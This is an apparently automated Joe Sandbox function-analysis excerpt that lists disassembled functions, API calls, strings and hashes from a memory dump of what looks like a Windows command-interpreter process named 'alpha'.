                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                      • String ID:
                                      • API String ID: 1356649289-0
                                      • Opcode ID: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                      • Instruction ID: aa9101d8252a70c8fcdbe3cfa10c5d0247c477928fd359ec59e2386656d8533a
                                      • Opcode Fuzzy Hash: 8cb344cfa4787b055339b8a9ee12bbc5c0a371722c2d9f6503a0875dc2cc5f96
                                      • Instruction Fuzzy Hash: 2F917FBBA0864387EA54AF21E400179FAE1FB88F99F8C9535DA5E47790DF3CD4408B20
                                      Function 00007FF755CC86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: LocalTime$ErrorLast_get_osfhandle
                                      • String ID: %s$/-.$:
                                      • API String ID: 1644023181-879152773
                                      • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction ID: fdda612b7bf8bffc6e77382479fc40c05c868aa9cc8fe6cef8ef02a5e765e1ac
                                      • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                      • Instruction Fuzzy Hash: 5191B3ABA0864391EF50EB60D4502BAE7A0FF84F98FCC5535DA5E46AD4EE3CE545C320
                                      Function 00007FF755CC627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF755CC7251), ref: 00007FF755CC628E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: ObjectSingleWait
                                      • String ID: wil
                                      • API String ID: 24740636-1589926490
                                      • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction ID: 03437a66a8acd2bce4762e13df1192df704aa7fc8dad580e00d8969e96cbdbdc
                                      • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                      • Instruction Fuzzy Hash: E74165A7A0854383F3606B19E600279E6A1EF85F89FDCB131D92A866D4DF3DD4858721
                                      Function 00007FF755CCCDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                      • String ID: $Application$System
                                      • API String ID: 3377411628-1881496484
                                      • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                      • Instruction ID: ab197a323cc7e12abb754876e8281fa1112d39817f11ece256173a8ba0d56807
                                      • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                      • Instruction Fuzzy Hash: FB4159B7B04B429AE750AB60E4403EDB7B5FB89B4CF885135DA4E42B98EF38D145C750
                                      Function 00007FF755CA14E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                      • String ID: :$\
                                      • API String ID: 3961617410-1166558509
                                      • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                      • Instruction ID: 2d70249dd6e8c791c133ff8d7d58a17dcf73c492ac13172cd65e8223d37ac470
                                      • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                      • Instruction Fuzzy Hash: B12192BBA08A8386E7506B60E454079FAA1FF89F99BCC8531D91F87790DF3CD8458620
                                      Function 00007FF755CA7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryDriveFullNamePathTypememset
                                      • String ID:
                                      • API String ID: 1397130798-0
                                      • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                      • Instruction ID: bdde95152f835d40aaff380730d1de1142978b60f73817196d03b702b7c1d0d1
                                      • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                      • Instruction Fuzzy Hash: 5091A6ABA0878386EB65AB11D8402B9F7E1FB44F98FC88135D94D47B94DF3DD9408320
                                      Function 00007FF755CB258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06D6
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB06F0
                                        • Part of subcall function 00007FF755CB06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB074D
                                        • Part of subcall function 00007FF755CB06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF755CAB4DB), ref: 00007FF755CB0762
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB25CA
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB25E8
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB260F
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB2636
                                      • _wcsicmp.MSVCRT ref: 00007FF755CB2650
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmp$Heap$AllocProcess
                                      • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                      • API String ID: 3407644289-1668778490
                                      • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                      • Instruction ID: de08281ef0f2df058a4d1a9c3b1923d3887b825842d13a9c988f9a23790f9b3e
                                      • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                      • Instruction Fuzzy Hash: A6318DABA0854381FB507F61E811379E6A4EF85F98FCC8435DA4E862A5DE7CE801C731
                                      Function 00007FF755CD0C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                      • String ID: &()[]{}^=;!%'+,`~
                                      • API String ID: 2516562204-381716982
                                      • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                      • Instruction ID: e273587027f887b2074786c882edfcecfc90a76e2e22cb30eec507e15773f148
                                      • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                      • Instruction Fuzzy Hash: 62C1B1BBA0469286E790AF25E8402BDBBA0FB44F98F985135DE8D53B94DF3CE451C710
                                      Function 00007FF755CB7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CAD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD46E
                                        • Part of subcall function 00007FF755CAD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF755CAD485
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD4EE
                                        • Part of subcall function 00007FF755CAD3F0: iswspace.MSVCRT ref: 00007FF755CAD54D
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD569
                                        • Part of subcall function 00007FF755CAD3F0: wcschr.MSVCRT ref: 00007FF755CAD58C
                                      • iswspace.MSVCRT ref: 00007FF755CB7EEE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                      • String ID: A
                                      • API String ID: 3731854180-3554254475
                                      • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction ID: 3c216d41d7fc8304a0a2ba7fe591fadd040aa1ba45b88cfcb13da35294e04138
                                      • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                      • Instruction Fuzzy Hash: C0A17FAB90968385E660AB11A45027DF7A0FF45F98FC89138DA5D47794EF3CE442DB20
                                      Function 00007FF755CCA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                      • String ID: NTDLL.DLL$NtQueryInformationProcess
                                      • API String ID: 1580871199-2613899276
                                      • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                      • Instruction ID: 755817d8110116f08696ab2d24cd81590d939f796dc2df318c8c47438126ff5f
                                      • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                      • Instruction Fuzzy Hash: 3C5162B6A18B8386EB509B15A8042B9B7A4FB88F88F896135DA5D47B94DF3CD441C710
                                      Function 00007FF755CA7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                      • String ID: con
                                      • API String ID: 689241570-4257191772
                                      • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                      • Instruction ID: 9c8dcfecd28d6c0326ef28215ad4318520c299bf06dc7bf01f3a795db6a3665b
                                      • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                      • Instruction Fuzzy Hash: AD41C47BA0864686E610AF11D444379FAE1F789FA9F988734DA2D473D0CF3DD8498750
                                      Function 00007FF755CCA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                      • String ID: PE
                                      • API String ID: 2941894976-4258593460
                                      • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                      • Instruction ID: d2d6c0fa4bd03f395b5ac6abf3d740e63f8a5ae9ad7c3c4c3f717cc803ab0d41
                                      • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                      • Instruction Fuzzy Hash: 3E4187AB61868387E650AB11E814279F7B0FB89F94F895130DE6D43B95DF3CD445CB10
                                      Function 00007FF755CB0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF755CC849D,?,?,?,00007FF755CCF0C7), ref: 00007FF755CB0045
                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF755CCF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF755CCE964), ref: 00007FF755CB0071
                                      • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0092
                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF755CB00A7
                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB0148
                                      • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB0181
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                      • String ID:
                                      • API String ID: 734197835-0
                                      • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                      • Instruction ID: ebb9bbabd97acd5f6dfe653cd31bf7a1aa051f8c9b53f2035ee0cc5a5e26201a
                                      • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                      • Instruction Fuzzy Hash: 40618FBBA0869386E764AB11A804379FAA1FB45F6CFC88135D94E52794DF3CA845C720
                                      Function 00007FF755CC9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Enum$Openwcsrchr
                                      • String ID: %s=%s$.$\Shell\Open\Command
                                      • API String ID: 3402383852-1459555574
                                      • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction ID: ea3943154b1f4061677e91a45b9d681a8c1871d91234b66dd6c3d4c912772969
                                      • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                      • Instruction Fuzzy Hash: 74A1B4ABA0868382EE10AB55D0502B9E2A0FF85F98FC85535DA5E4B7C5DF7CF941C320
                                      Function 00007FF755CB7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$wcscmp
                                      • String ID: %s
                                      • API String ID: 243296809-3043279178
                                      • Opcode ID: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction ID: 0d093746e14a501871b5a1a3b64ad7042bc1de33aa71188688b6f12e9c87786d
                                      • Opcode Fuzzy Hash: b0ad3edef7fc64e03d81687a8a254aeebb6f4c69458638a3e2c38bf1209308ef
                                      • Instruction Fuzzy Hash: 08A192AB70968786EB62EB21D8403F9A3A0FB48B5CFD84135CE4D47695DF3CEA448310
                                      Function 00007FF755CA1F90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$EnvironmentVariable
                                      • String ID: DIRCMD
                                      • API String ID: 1405722092-1465291664
                                      • Opcode ID: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                      • Instruction ID: 8e756c3ae51bd03c351cfd60d39a837d687a4c9f1904d7840ce064ef7d84968a
                                      • Opcode Fuzzy Hash: ffb8ac6f460930c1464a251cfe4f6a37909ed3687fd59a2300d1627ea223b7d7
                                      • Instruction Fuzzy Hash: EE8160B7A04BC289EB20DF60E8802ED77A5FB44B48F944139DB8D57B58DF38D5458710
